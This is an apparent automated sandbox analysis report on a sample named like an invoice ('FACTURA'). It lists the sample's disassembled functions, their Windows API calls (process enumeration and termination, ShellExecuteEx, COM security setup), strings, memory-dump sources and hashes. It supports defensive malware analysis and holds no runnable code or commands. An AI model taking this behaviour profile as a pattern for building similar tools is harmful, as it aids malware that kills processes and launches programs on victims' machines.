                                                                            • Instruction Fuzzy Hash: 2FC17F71F0421A9BDF10DF98D884AAFBBF5EB48314F148469ED05AB281E7B09D45DBA0
                                                                            Function 00F49113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$_memset
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 2862541840-625585964
                                                                            • Opcode ID: 4d55b0e93c287fdd0a4209dba617a7a8ac713917abd06f7d946fbf48b8ba045c
                                                                            • Instruction ID: 349b4d9eaf527f5f76952e69ad34972e3dcb526006da00be02afb16c16701725
                                                                            • Opcode Fuzzy Hash: 4d55b0e93c287fdd0a4209dba617a7a8ac713917abd06f7d946fbf48b8ba045c
                                                                            • Instruction Fuzzy Hash: FB919071E04219ABDF24DFA5CC48FAFBBB8EF45720F108159F915AB281D7B09905DBA0
                                                                            Function 00F4975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F2710A: CLSIDFromProgID.COMBASE ref: 00F27127
                                                                              • Part of subcall function 00F2710A: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00F27142
                                                                              • Part of subcall function 00F2710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27044,80070057,?,?), ref: 00F27150
                                                                              • Part of subcall function 00F2710A: CoTaskMemFree.COMBASE(00000000), ref: 00F27160
                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00F49806
                                                                            • _memset.LIBCMT ref: 00F49813
                                                                            • _memset.LIBCMT ref: 00F49956
                                                                            • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 00F49982
                                                                            • CoTaskMemFree.COMBASE(?), ref: 00F4998D
                                                                            Strings
                                                                            • NULL Pointer assignment, xrefs: 00F499DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 1300414916-2785691316
                                                                            • Opcode ID: 3e2aba92b43b48399e108e95d0bb8b0af3e31ce07b3fedd940c8e1bb8ffaff6b
                                                                            • Instruction ID: 29a1e8e08defe0fcba047de6a88eb49745845bf92f94360572d7cd8ae4c2074b
                                                                            • Opcode Fuzzy Hash: 3e2aba92b43b48399e108e95d0bb8b0af3e31ce07b3fedd940c8e1bb8ffaff6b
                                                                            • Instruction Fuzzy Hash: 87914871D04229EBDB10DFA4DC85EDEBBB9EF08310F10415AF919A7281EB719A45DFA0
                                                                            Function 00F56D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F56E24
                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F56E38
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F56E52
                                                                            • _wcscat.LIBCMT ref: 00F56EAD
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F56EC4
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F56EF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat
                                                                            • String ID: SysListView32
                                                                            • API String ID: 307300125-78025650
                                                                            • Opcode ID: c6ba32903f04d6fef4200f4014aa4ea3cfa68d88747c8b2007b3df7dae423079
                                                                            • Instruction ID: e5eb156e4eb050624bfc664b892eccb0e6426e1438024109b37dfa9654ae17fb
                                                                            • Opcode Fuzzy Hash: c6ba32903f04d6fef4200f4014aa4ea3cfa68d88747c8b2007b3df7dae423079
                                                                            • Instruction Fuzzy Hash: CF41C470A00308ABDB219F64CC45BEE77F8EF08361F50046AFA54E7191D7719D899B60
                                                                            Function 00F4E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F33C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00F33C7A
                                                                              • Part of subcall function 00F33C55: Process32FirstW.KERNEL32(00000000,?), ref: 00F33C88
                                                                              • Part of subcall function 00F33C55: CloseHandle.KERNEL32(00000000), ref: 00F33D52
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4E9A4
                                                                            • GetLastError.KERNEL32 ref: 00F4E9B7
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4E9E6
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F4EA63
                                                                            • GetLastError.KERNEL32(00000000), ref: 00F4EA6E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F4EAA3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: aaaaa1d9f996e863c48ca1e11ce1554f4f111ba400fba436f284bb98574cfe9c
                                                                            • Instruction ID: e131339287df3690b08ab3817cd46d8d63190f612a2525766a571751830c8eee
                                                                            • Opcode Fuzzy Hash: aaaaa1d9f996e863c48ca1e11ce1554f4f111ba400fba436f284bb98574cfe9c
                                                                            • Instruction Fuzzy Hash: FC41AD316002059FDB14EF14DC95F6DBBE5BF40714F188459FA429B3D2CB79A809EB91
                                                                            Function 00F32F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00F33033
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-404129466
                                                                            • Opcode ID: 9fb628a90009ec513d16e19d44b75ea0cabb7105f256db79b9efa24ffc3b4ef3
                                                                            • Instruction ID: 5a2255e483c212ac6041c6681b3f8eea1fc3e422ee5b07dacddfafc38138921e
                                                                            • Opcode Fuzzy Hash: 9fb628a90009ec513d16e19d44b75ea0cabb7105f256db79b9efa24ffc3b4ef3
                                                                            • Instruction Fuzzy Hash: 3311EB7274C34ABEE719DA54DC82DAB779C9F15374F20002AFB00A6181DB719F4176A5
                                                                            Function 00F342F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F34312
                                                                            • LoadStringW.USER32(00000000), ref: 00F34319
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F3432F
                                                                            • LoadStringW.USER32(00000000), ref: 00F34336
                                                                            • _wprintf.LIBCMT ref: 00F3435C
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F3437A
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00F34357
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 3648134473-3128320259
                                                                            • Opcode ID: 06f931074cb853644bf275858341b8d1a814947033b5094ff6dcbb76c32b5b94
                                                                            • Instruction ID: 2973691e5f1ed445b9d92fc1b742cff49005283f32b02eeaa7d355f5242c0bfa
                                                                            • Opcode Fuzzy Hash: 06f931074cb853644bf275858341b8d1a814947033b5094ff6dcbb76c32b5b94
                                                                            • Instruction Fuzzy Hash: 66014FF290030CBFE711A7A0DD89EEB776CDB08311F4005E1BB45E2052EA75AE896B71
                                                                            Function 00ED2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F0C1C7,00000004,00000000,00000000,00000000), ref: 00ED2ACF
                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F0C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00ED2B17
                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F0C1C7,00000004,00000000,00000000,00000000), ref: 00F0C21A
                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F0C1C7,00000004,00000000,00000000,00000000), ref: 00F0C286
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: 4718f2ce997c43f7b094296833c62c7666ce6982fed4a4b8018ee813dc4d69c2
                                                                            • Instruction ID: 418dd8fad0f06b611e1bc2f02ae74789ef1b661987b6239addf138b1ed63b9f8
                                                                            • Opcode Fuzzy Hash: 4718f2ce997c43f7b094296833c62c7666ce6982fed4a4b8018ee813dc4d69c2
                                                                            • Instruction Fuzzy Hash: DB4148307087809ACB359B28CC8CBAF7B92EB65314F54A91FE347A67A0C6719847F750
                                                                            Function 00F370C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F370DD
                                                                              • Part of subcall function 00EF0DB6: std::exception::exception.LIBCMT ref: 00EF0DEC
                                                                              • Part of subcall function 00EF0DB6: __CxxThrowException@8.LIBCMT ref: 00EF0E01
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F37114
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 00F37130
                                                                            • _memmove.LIBCMT ref: 00F3717E
                                                                            • _memmove.LIBCMT ref: 00F3719B
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00F371AA
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F371BF
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F371DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 256516436-0
                                                                            • Opcode ID: e6cb12ae87abc371416279b00043e7c9030921ee5b40bd96b02b9255ddb09547
                                                                            • Instruction ID: b718438e4608bc418f31ba4641a30a4848afe20da231df53e1dd4d76435b9acd
                                                                            • Opcode Fuzzy Hash: e6cb12ae87abc371416279b00043e7c9030921ee5b40bd96b02b9255ddb09547
                                                                            • Instruction Fuzzy Hash: 13316176900209EBCF10EFA4DC859AFBBB8EF45711F1441B5FA04AB256DB709E14DBA0
                                                                            Function 00F561D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 00F561EB
                                                                            • GetDC.USER32(00000000), ref: 00F561F3
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F561FE
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00F5620A
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F56246
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F56257
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F5902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00F56291
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F562B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 1d2ff3aef39e84addea8533b3102df8ab0b9f64a298d173e611f22399203d93e
                                                                            • Instruction ID: 2633672f313dc4d0a3edd2eb57e32ac9d34ece87fed01c3143d0ab300615ef58
                                                                            • Opcode Fuzzy Hash: 1d2ff3aef39e84addea8533b3102df8ab0b9f64a298d173e611f22399203d93e
                                                                            • Instruction Fuzzy Hash: 5D315C72101214BFEF118F508C8AFAB3BA9EF49766F0440A5FF08DA192C6759845DB60
                                                                            Function 00F2BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: 9840b574a6c8bf15b376bcf6ba748677dcdd40a72dabb31535d01db2ccfa122a
                                                                            • Instruction ID: c581ad40d82043ac9b37c06e3f61493883e311f7565db2e9235c5a8f28d72f72
                                                                            • Opcode Fuzzy Hash: 9840b574a6c8bf15b376bcf6ba748677dcdd40a72dabb31535d01db2ccfa122a
                                                                            • Instruction Fuzzy Hash: B3219C71A4162E77E6046611BD42FFB775D9E90378F044020FE0466687EB54DF11B1A1
                                                                            Function 00ED1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be931bf582bd021c159e7976570e16ad9e39afc91f4f72da5ede64e33d6f5688
                                                                            • Instruction ID: 607f56f80038d6fa2462703e639a6a971254d267e70fa9005f5dd5cf41e4ee40
                                                                            • Opcode Fuzzy Hash: be931bf582bd021c159e7976570e16ad9e39afc91f4f72da5ede64e33d6f5688
                                                                            • Instruction Fuzzy Hash: D1714D30900119FFCB149F98CC45ABEBB79FF85325F14819AF915AB291C734AA52DBA0
                                                                            Function 00F5B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindow.USER32(01142618), ref: 00F5B3EB
                                                                            • IsWindowEnabled.USER32(01142618), ref: 00F5B3F7
                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F5B4DB
                                                                            • SendMessageW.USER32(01142618,000000B0,?,?), ref: 00F5B512
                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 00F5B54F
                                                                            • GetWindowLongW.USER32(01142618,000000EC), ref: 00F5B571
                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F5B589
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                            • String ID:
                                                                            • API String ID: 4072528602-0
                                                                            • Opcode ID: a501806de07a6dc31c2526f43019af110a43a966698fb9318300cc2a8804ce2a
                                                                            • Instruction ID: 3f644fefe14eca17fb4cf79d88da82bf9f4f385c5df5be972e44a7b38e0912c7
                                                                            • Opcode Fuzzy Hash: a501806de07a6dc31c2526f43019af110a43a966698fb9318300cc2a8804ce2a
                                                                            • Instruction Fuzzy Hash: C3718E34A04608AFDF35DF54C894FBABBA5FF09322F144059EF46972A2C731A949EB50
                                                                            Function 00F4F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F4F448
                                                                            • _memset.LIBCMT ref: 00F4F511
                                                                            • ShellExecuteExW.SHELL32(?), ref: 00F4F556
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                              • Part of subcall function 00EEFC86: _wcscpy.LIBCMT ref: 00EEFCA9
                                                                            • GetProcessId.KERNEL32(00000000), ref: 00F4F5CD
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F4F5FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
